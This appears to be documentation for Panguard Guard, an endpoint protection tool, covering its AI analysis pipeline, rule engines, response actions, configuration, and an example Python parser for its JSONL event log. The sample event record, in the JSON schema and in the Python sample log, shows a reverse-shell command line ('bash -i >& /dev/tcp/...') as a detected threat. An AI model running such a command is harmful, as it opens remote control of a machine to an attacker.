Panguard Guard
Real-time endpoint protection powered by a 5-agent AI pipeline. Guard monitors processes, network traffic, and file system changes 24/7 using Sigma, YARA, and ATR rule engines backed by a three-layer AI analysis funnel.
Quick Start
panguard guard start
panguard guard status
panguard guard stop
By default, Guard starts in monitor mode. It logs threats but does not take automated action until you switch to protect mode.
5-Agent Pipeline
Every event flows through five specialised agents in sequence. Each agent enriches the event context before passing it to the next.
| Agent | Role | Description |
|---|---|---|
| Detect | Rule matching | Runs Sigma, YARA, and ATR rules against incoming telemetry. Produces raw alerts with severity and confidence scores. |
| Analyze | AI triage | Escalates ambiguous alerts through the three-layer AI funnel. Adjusts confidence scores and adds contextual reasoning. |
| Respond | Action execution | Selects and executes response actions based on confidence thresholds: auto-act, confirm, or notify. |
| Report | Structured logging | Writes JSONL event records, generates daily summaries, and pushes notifications to configured channels. |
| Chat | Interactive query | Natural-language interface for investigating past events, tuning rules, and asking follow-up questions about alerts. |
Detection Engines
Guard ships with three rule engines. All rules are updated automatically via the Panguard rule feed.
| Engine | Rules | Scope |
|---|---|---|
| Sigma | 3,760 | Generic log-based detection. Covers process creation, network connections, registry changes, and system events. |
| YARA | 5,961 | Binary and file pattern matching. Detects malware families, packers, exploit kits, and suspicious file structures. |
| ATR | 69 | AI Agent Threat Rules. Purpose-built for prompt injection, tool poisoning, MCP server abuse, and credential exfiltration by autonomous agents. |
Three-Layer AI Funnel
Not every alert needs cloud-scale AI. The funnel resolves the vast majority of events locally, keeping latency low and costs predictable.
Layer 1: Rules
Sigma, YARA, and ATR engines resolve clear-cut matches. No AI involved.
Layer 2: Local AI (Ollama)
Ambiguous alerts are analysed by a local LLM running on-device via Ollama. No data leaves the machine.
Layer 3: Cloud AI
Complex, multi-signal events are escalated to cloud AI for deep reasoning and cross-tenant intelligence.
Response Actions
Guard supports six response actions. In protect mode, the Respond agent selects actions automatically based on confidence thresholds.
| Action | Description |
|---|---|
| block_ip | Add source IP to firewall deny list (iptables / pf). |
| kill_process | Terminate the offending process tree immediately. |
| quarantine_file | Move file to quarantine directory and strip execute permissions. |
| alert | Send notification via configured channels (Slack, email, webhook). |
| snapshot | Capture full process state, environment, and open file handles for forensics. |
| escalate | Forward event to SOC / human analyst for manual triage. |
Confidence Thresholds
Configuration
View and modify Guard configuration interactively:
panguard guard config
Key Options
| Option | Values | Default | Description |
|---|---|---|---|
| mode | monitor / protect | monitor | Monitor logs only, or actively respond to threats. |
| auto_response | true / false | false | Enable automated response actions in protect mode. |
| notification.slack | webhook URL | (none) | Slack incoming webhook for alert delivery. |
| notification.email | address | (none) | Email address for critical alert notifications. |
| notification.webhook | URL | (none) | Generic webhook endpoint for all events. |
| ai.local_model | model name | llama3.2:3b | Ollama model used for Layer 2 analysis. |
| ai.cloud_enabled | true / false | true | Allow Layer 3 cloud AI escalation. |
panguard guard config set mode protect
panguard guard config set auto_response true
panguard guard config set notification.slack https://hooks.slack.com/services/T.../B.../xxx
Monitoring and Logs
Guard writes structured event logs in JSONL format. Each line is a self-contained JSON object with timestamp, severity, rule ID, and action taken.
~/.panguard-guard/events.jsonl
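As an added example (not Panguard's own code), a small Python consumer for this log: it parses records line by line, counts malformed or truncated lines instead of aborting, summarises by severity, engine and funnel layer, and pulls out high-severity events whose response action was not executed. The sample records are constructed around the event record format documented on this page; the `low`/`medium` severities, the `pending` action status and the `yara:`/`atr:` rule ids in them are assumptions.

```python
"""JSONL consumer for Guard's event log; example code for this page, not
Panguard's own. Sample records are constructed around the documented format."""
import json
from collections import Counter

# Fields every record carries, per the event record format on this page.
REQUIRED_FIELDS = ("timestamp", "severity", "rule_id", "engine", "layer",
                   "confidence", "action", "action_status")
# "high"/"critical" appear on this page; the other two levels are assumed.
SEVERITY_ORDER = {"low": 0, "medium": 1, "high": 2, "critical": 3}
# Constructed sample: the documented record, two made-up ones (the "pending"
# status and yara:/atr: rule ids are assumptions) and a truncated last line.
SAMPLE_LOG = """\
{"timestamp":"2026-03-08T14:32:01.442Z","severity":"high","rule_id":"sigma:proc_creation_suspicious_shell","engine":"sigma","layer":1,"confidence":0.94,"action":"kill_process","action_status":"executed","process":{"pid":48291,"name":"bash","cmdline":"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"},"host":"prod-web-03"}
{"timestamp":"2026-03-08T14:35:10.001Z","severity":"medium","rule_id":"yara:packer_upx","engine":"yara","layer":2,"confidence":0.61,"action":"alert","action_status":"executed","host":"prod-web-03"}
{"timestamp":"2026-03-08T14:40:00.000Z","severity":"high","rule_id":"atr:prompt_injection_tool_call","engine":"atr","layer":3,"confidence":0.88,"action":"escalate","action_status":"pending","host":"prod-web-03"}
{"timestamp":"2026-03-08T14:41
"""

def parse_events(text):
    """Parse JSONL into (events, malformed_count). Unparseable lines and
    records missing a required field are counted and skipped, not fatal."""
    events, malformed = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            malformed += 1
            continue
        if all(k in rec for k in REQUIRED_FIELDS):
            events.append(rec)
        else:
            malformed += 1
    return events, malformed

def summarize(events):
    """Counts by severity, rule engine and funnel layer."""
    return {"by_severity": dict(Counter(e["severity"] for e in events)),
            "by_engine": dict(Counter(e["engine"] for e in events)),
            "by_layer": dict(Counter(e["layer"] for e in events))}

def needs_attention(events, min_severity="high"):
    """Events at or above min_severity whose action did not execute: the
    ones an analyst should follow up by hand."""
    floor = SEVERITY_ORDER[min_severity]
    return [e for e in events
            if SEVERITY_ORDER.get(e["severity"], 0) >= floor
            and e["action_status"] != "executed"]
```

To run it against a live log, pass `open(os.path.expanduser("~/.panguard-guard/events.jsonl")).read()` to `parse_events` instead of `SAMPLE_LOG`.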
Verbose Output
Use the --verbose flag to stream events to stdout in real time:
panguard guard start --verbose
Event Callback Format
Each event record follows this structure:
{
"timestamp": "2026-03-08T14:32:01.442Z",
"severity": "high",
"rule_id": "sigma:proc_creation_suspicious_shell",
"engine": "sigma",
"layer": 1,
"confidence": 0.94,
"action": "kill_process",
"action_status": "executed",
"process": {
"pid": 48291,
"name": "bash",
"cmdline": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
},
"host": "prod-web-03"
}
System Service
Install Guard as a system service so it starts automatically on boot. On Linux this creates a systemd unit; on macOS it creates a launchd plist.
panguard guard install
panguard guard uninstall
Both commands require root / administrator privileges. Guard will prompt for elevation if not already running as root.
Telemetry
Guard collects anonymous usage telemetry to improve rule quality and false-positive rates. No file contents, process arguments, or personally identifiable information is ever transmitted.
panguard guard start --no-telemetry
panguard guard --show-upload-data
Full details on data collection and retention are available in PRIVACY.md.
Platform Notes
| Feature | Linux | macOS | Windows |
|---|---|---|---|
| Core Guard daemon | Yes | Yes | Yes |
| Sigma / YARA / ATR | Yes | Yes | Yes |
| Falco (eBPF kernel events) | Yes | No | No |
| Suricata DPI (deep packet inspection) | Yes | No | No |
| systemd service | Yes | -- | -- |
| launchd service | -- | Yes | -- |
For Falco and Suricata setup instructions, see the Advanced Setup Guide.
Start Protecting
Install Panguard and activate Guard in under a minute. Community plan includes full scan and Layer 1 rule-based protection at no cost.
panguard guard start